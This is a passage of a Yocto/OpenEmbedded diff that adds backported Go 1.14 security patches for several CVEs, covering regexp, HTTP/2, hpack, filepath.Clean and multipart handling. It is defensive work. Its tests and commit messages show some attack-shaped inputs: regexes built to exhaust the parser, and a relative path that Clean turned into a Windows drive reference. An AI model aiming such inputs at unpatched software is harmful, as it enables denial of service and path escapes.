++ // x{2,5} = xx(x(x(x)?)?)?
++ size = int64(re.Max)*sub + int64(re.Max-re.Min)
++ }
++
++ if size < 1 {
++ size = 1
++ }
++ p.size[re] = size
++ return size
++}
++
+ func (p *parser) checkHeight(re *Regexp) {
+ if p.numRegexp < maxHeight {
+ return
+@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+ func (p *parser) push(re *Regexp) *Regexp {
++ p.numRunes += len(re.Rune)
+ if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
+ // Single rune.
+ if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
+@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
+- p.checkHeight(re)
++ p.checkLimits(re)
+ return re
+ }
+
+@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
+- p.checkHeight(re)
++ p.checkLimits(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+
+ for j := start; j < i; j++ {
+ sub[j] = p.removeLeadingString(sub[j], len(str))
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+ for j := start; j < i; j++ {
+ reuse := j != start // prefix came from sub[start]
+ sub[j] = p.removeLeadingRegexp(sub[j], reuse)
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 1ef6d8a..67e3c56 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -484,12 +484,15 @@ var invalidRegexps = []string{
+ `(?P<>a)`,
+ `[a-Z]`,
+ `(?i)[a-Z]`,
+- `a{100000}`,
+- `a{100000,}`,
+- "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
+- strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
+- strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
++ `a{100000}`, // too much repetition
++ `a{100000,}`, // too much repetition
++ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})", // too much repetition
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000), // too deep
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
++ "(" + strings.Repeat("(xx?)", 1000) + "){1000}", // too long
++ strings.Repeat("(xx?){1000}", 1000), // too long
++ strings.Repeat(`\pL`, 27000), // too many runes
+ }
+
+ var onlyPerl = []string{
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
new file mode 100644
index 0000000000..8bf22ee4d4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
+From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 30 Nov 2022 16:46:33 -0500
+Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
+ golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+For #56350.
+For #57009.
+Fixes CVE-2022-41717.
+
+Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Jenny Rakoczy <jenny@golang.org>
+Reviewed-by: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
+CVE-2022-41717
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/h2_bundle.go | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 83f2a72..cc03a62 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4096,6 +4096,7 @@ type http2serverConn struct {
+ headerTableSize uint32
+ peerMaxHeaderListSize uint32 // zero means unknown (default)
+ canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
++ canonHeaderKeysSize int // canonHeader keys size in bytes
+ writingFrame bool // started writing a frame (on serve goroutine or separate)
+ writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
+ needsFrameFlush bool // last frame write wasn't a flush
+@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
+ }
+ }
+
++// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
++// of the entries in the canonHeader cache.
++// This should be larger than the size of unique, uncommon header keys likely to
++// be sent by the peer, while not so high as to permit unreasonable memory usage
++// if the peer sends an unbounded number of unique header keys.
++const http2maxCachedCanonicalHeadersKeysSize = 2048
++
+ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.serveG.check()
+ http2buildCommonHeaderMapsOnce()
+@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
+- // entries in the canonHeader cache. This should be larger than the number
+- // of unique, uncommon header keys likely to be sent by the peer, while not
+- // so high as to permit unreaasonable memory usage if the peer sends an unbounded
+- // number of unique header keys.
+- const maxCachedCanonicalHeaders = 32
+- if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
++ if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
+ sc.canonHeader[v] = cv
++ sc.canonHeaderKeysSize += size
+ }
+ return cv
+ }
+--
+2.30.2
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
new file mode 100644
index 0000000000..f5bffd7a0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
@@ -0,0 +1,53 @@
+From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
+From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
+Date: Fri, 22 Apr 2022 10:07:51 +0900
+Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
+ path contains ":".
+
+Fixes #52476
+
+Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
+Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
+Auto-Submit: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
+Run-TryBot: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 26f1833..92dc090 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -116,9 +116,21 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
++ case path[r] == '.' && r+1 == n:
+ // . element
+ r++
++ case path[r] == '.' && os.IsPathSeparator(path[r+1]):
++ // ./ element
++ r++
++
++ for r < len(path) && os.IsPathSeparator(path[r]) {
++ r++
++ }
++ if out.w == 0 && volumeNameLen(path[r:]) > 0 {
++ // When joining prefix "." and an absolute path on Windows,
++ // the prefix should not be removed.
++ out.append('.')
++ }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
new file mode 100644
index 0000000000..e1f7a55581
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
+From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 12 Dec 2022 16:43:37 -0800
+Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
+ Windows
+
+Do not permit Clean to convert a relative path into one starting
+with a drive reference. This change causes Clean to insert a .
+path element at the start of a path when the original path does not
+start with a volume name, and the first path element would contain
+a colon.
+
+This may introduce a spurious but harmless . path element under
+some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
+
+This reverts CL 401595, since the change here supersedes the one
+in that CL.
+
+Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
+
+Updates #57274
+Fixes #57276
+Fixes CVE-2022-41722
+
+Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 27 ++++++++++++++-------------
+ 1 file changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 92dc090..f0f095e 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -14,6 +14,7 @@ package filepath
+ import (
+ "errors"
+ "os"
++ "runtime"
+ "sort"
+ "strings"
+ )
+@@ -116,21 +117,9 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && r+1 == n:
++ case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
+ // . element
+ r++
+- case path[r] == '.' && os.IsPathSeparator(path[r+1]):
+- // ./ element
+- r++
+-
+- for r < len(path) && os.IsPathSeparator(path[r]) {
+- r++
+- }
+- if out.w == 0 && volumeNameLen(path[r:]) > 0 {
+- // When joining prefix "." and an absolute path on Windows,
+- // the prefix should not be removed.
+- out.append('.')
+- }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+@@ -156,6 +145,18 @@ func Clean(path string) string {
+ if rooted && out.w != 1 || !rooted && out.w != 0 {
+ out.append(Separator)
+ }
++ // If a ':' appears in the path element at the start of a Windows path,
++ // insert a .\ at the beginning to avoid converting relative paths
++ // like a/../c: into c:.
++ if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
++ for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
++ if path[i] == ':' {
++ out.append('.')
++ out.append(Separator)
++ break
++ }
++ }
++ }
+ // copy element
+ for ; r < n && !os.IsPathSeparator(path[r]); r++ {
+ out.append(path[r])
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
new file mode 100644
index 0000000000..a93fa31dcd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
+From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 6 Feb 2023 10:03:44 -0800
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+Fixes CVE-2022-41723
+Fixes #58355
+Updates #57855
+
+Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
+CVE: CVE-2022-41723
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
+ 1 file changed, 49 insertions(+), 30 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+index 85f18a2..02e80e3 100644
+--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
++++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+
+ var hf HeaderField
+ wantStr := d.emitEnabled || it.indexed()
++ var undecodedName undecodedString
+ if nameIdx > 0 {
+ ihf, ok := d.at(nameIdx)
+ if !ok {
+@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+ }
+ hf.Name = ihf.Name
+ } else {
+- hf.Name, buf, err = d.readString(buf, wantStr)
++ undecodedName, buf, err = d.readString(buf)
+ if err != nil {
+ return err
+ }
+ }
+- hf.Value, buf, err = d.readString(buf, wantStr)
++ undecodedValue, buf, err := d.readString(buf)
+ if err != nil {
+ return err
+ }
++ if wantStr {
++ if nameIdx <= 0 {
++ hf.Name, err = d.decodeString(undecodedName)
++ if err != nil {
++ return err
++ }
++ }
++ hf.Value, err = d.decodeString(undecodedValue)
++ if err != nil {
++ return err
++ }
++ }
+ d.buf = buf
+ if it.indexed() {
+ d.dynTab.add(hf)
+@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
+ return 0, origP, errNeedMore
+ }
+
+-// readString decodes an hpack string from p.
++// readString reads an hpack string from p.
+ //
+-// wantStr is whether s will be used. If false, decompression and
+-// []byte->string garbage are skipped if s will be ignored
+-// anyway. This does mean that huffman decoding errors for non-indexed
+-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
+-// is returning an error anyway, and because they're not indexed, the error
+-// won't affect the decoding state.
+-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
++// It returns a reference to the encoded string data to permit deferring decode costs
++// until after the caller verifies all data is present.
++func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
+ if len(p) == 0 {
+- return "", p, errNeedMore
++ return u, p, errNeedMore
+ }
+ isHuff := p[0]&128 != 0
+ strLen, p, err := readVarInt(7, p)
+ if err != nil {
+- return "", p, err
++ return u, p, err
+ }
+ if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
+- return "", nil, ErrStringLength
++ // Returning an error here means Huffman decoding errors
++ // for non-indexed strings past the maximum string length
++ // are ignored, but the server is returning an error anyway
++ // and because the string is not indexed the error will not
++ // affect the decoding state.
++ return u, nil, ErrStringLength
+ }
+ if uint64(len(p)) < strLen {
+- return "", p, errNeedMore
+- }
+- if !isHuff {
+- if wantStr {
+- s = string(p[:strLen])
+- }
+- return s, p[strLen:], nil
++ return u, p, errNeedMore
+ }
++ u.isHuff = isHuff
++ u.b = p[:strLen]
++ return u, p[strLen:], nil
++}
+
+- if wantStr {
+- buf := bufPool.Get().(*bytes.Buffer)
+- buf.Reset() // don't trust others
+- defer bufPool.Put(buf)
+- if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
+- buf.Reset()
+- return "", nil, err
+- }
++type undecodedString struct {
++ isHuff bool
++ b []byte
++}
++
++func (d *Decoder) decodeString(u undecodedString) (string, error) {
++ if !u.isHuff {
++ return string(u.b), nil
++ }
++ buf := bufPool.Get().(*bytes.Buffer)
++ buf.Reset() // don't trust others
++ var s string
++ err := huffmanDecode(buf, d.maxStrLen, u.b)
++ if err == nil {
+ s = buf.String()
+- buf.Reset() // be nice to GC
+ }
+- return s, p[strLen:], nil
++ buf.Reset() // be nice to GC
++ bufPool.Put(buf)
++ return s, err
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
new file mode 100644
index 0000000000..37ebc41947
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
+From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
+From: avivklas <avivklas@gmail.com>
+Date: Fri, 7 Aug 2020 21:50:12 +0300
+Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
+
+Updates Reader.ReadForm to check for overflow errors that may
+result from a leeway addition of 10MiB to the input argument
+maxMemory.
+
+Fixes #40430
+
+Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
+Trust: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
+CVE: CVE-2022-41725 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 4 ++++
+ src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
+ 2 files changed, 22 insertions(+)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 832d0ad693666..4eb31012941ac 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "fmt"
+ "io"
+ "io/ioutil"
+ "net/textproto"
+@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
++ if maxValueBytes <= 0 {
++ return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ }
+ for {
+ p, err := r.NextPart()
+ if err == io.EOF {
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7d756c8c244a0..7112e0d3727fe 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "io"
++ "math"
+ "os"
+ "strings"
+ "testing"
+@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
++// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
++// instead of silently and subtly failing without indication.
++func TestReadFormMaxMemoryOverflow(t *testing.T) {
++ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(math.MaxInt64)
++ if err == nil {
++ t.Fatal("Unexpected a non-nil error")
++ }
++ if f != nil {
++ t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ }
++ if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
++ t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ }
++}
++
+ func TestReadFormWithTextContentType(t *testing.T) {
+ // From https://github.com/golang/go/issues/24041
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
new file mode 100644
index 0000000000..b951ee893e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
+From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
+From: Emmanuel T Odeke <emmanuel@orijtech.com>
+Date: Tue, 20 Oct 2020 04:11:12 -0700
+Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
+
+Tests that if the combination of:
+* HTTP multipart file payload size
+* ParseMultipartForm's maxMemory parameter
+* the internal leeway buffer size of 10MiB
+
+overflows, then we'll report an overflow instead of silently
+passing.
+
+Reapplies and fixes CL 254977, which was reverted in CL 263658.
+
+The prior test lacked a res.Body.Close(), so fixed that and
+added a leaked Transport check to verify correctness.
+
+Updates 40430.
+
+Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Bryan C. Mills <bcmills@google.com>
+Trust: Damien Neil <dneil@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
+CVE: CVE-2022-41725 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 45 insertions(+)
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index b4ef472e71229..19526b9ad791a 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -13,6 +13,7 @@ import (
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "mime/multipart"
+ . "net/http"
+ "net/http/httptest"
+@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
+ }
+ }
+
++// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
++// the payload size and the internal leeway buffer size of 10MiB overflows, that we
++// correctly return an error.
++func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
++ defer afterTest(t)
++
++ payloadSize := 1 << 10
++ cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
++ // The combination of:
++ // MaxInt64 + payloadSize + (internal spare of 10MiB)
++ // triggers the overflow. See issue https://golang.org/issue/40430/
++ if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
++ Error(rw, err.Error(), StatusBadRequest)
++ return
++ }
++ }))
++ defer cst.Close()
++ fBuf := new(bytes.Buffer)
++ mw := multipart.NewWriter(fBuf)
++ mf, err := mw.CreateFormFile("file", "myfile.txt")
++ if err != nil {
++ t.Fatal(err)
++ }
++ if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
++ t.Fatal(err)
++ }
++ if err := mw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ req, err := NewRequest("POST", cst.URL, fBuf)
++ if err != nil {
++ t.Fatal(err)
++ }
++ req.Header.Set("Content-Type", mw.FormDataContentType())
++ res, err := cst.Client().Do(req)
++ if err != nil {
++ t.Fatal(err)
++ }
++ res.Body.Close()
++ if g, w := res.StatusCode, StatusBadRequest; g != w {
++ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
++ }
++}
++
+ func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
+ func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
+ func testRedirect(t *testing.T, h2 bool) {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
new file mode 100644
index 0000000000..767225b888
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
+From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 3 Dec 2020 09:45:07 -0500
+Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
+
+Returning an error about integer overflow is needlessly pedantic.
+The meaning of ReadForm(MaxInt64) is easily understood
+(accept a lot of data) and can be implemented.
+
+Fixes #40430.
+
+Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
+CVE: CVE-2022-41725 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 8 ++++++--
+ src/mime/multipart/formdata_test.go | 14 +++++---------
+ src/net/http/request_test.go | 2 +-
+ 3 files changed, 12 insertions(+), 12 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 4eb31012941ac..9c42ea8c023b5 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,9 +7,9 @@ package multipart
+ import (
+ "bytes"
+ "errors"
+- "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "net/textproto"
+ "os"
+ )
+@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
+ if maxValueBytes <= 0 {
+- return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ if maxMemory < 0 {
++ maxValueBytes = 0
++ } else {
++ maxValueBytes = math.MaxInt64
++ }
+ }
+ for {
+ p, err := r.NextPart()
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7112e0d3727fe..e3a3a3eae8e15 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
+-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
+-// instead of silently and subtly failing without indication.
++// Issue 40430: Handle ReadForm(math.MaxInt64)
+ func TestReadFormMaxMemoryOverflow(t *testing.T) {
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
+ r := NewReader(b, boundary)
+ f, err := r.ReadForm(math.MaxInt64)
+- if err == nil {
+- t.Fatal("Unexpected a non-nil error")
+- }
+- if f != nil {
+- t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ if err != nil {
++ t.Fatalf("ReadForm(MaxInt64): %v", err)
+ }
+- if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
+- t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ if f == nil {
++ t.Fatal("ReadForm(MaxInt64): missing form")
+ }
+ }
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 19526b9ad791a..689498e19d5dd 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
+ t.Fatal(err)
+ }
+ res.Body.Close()
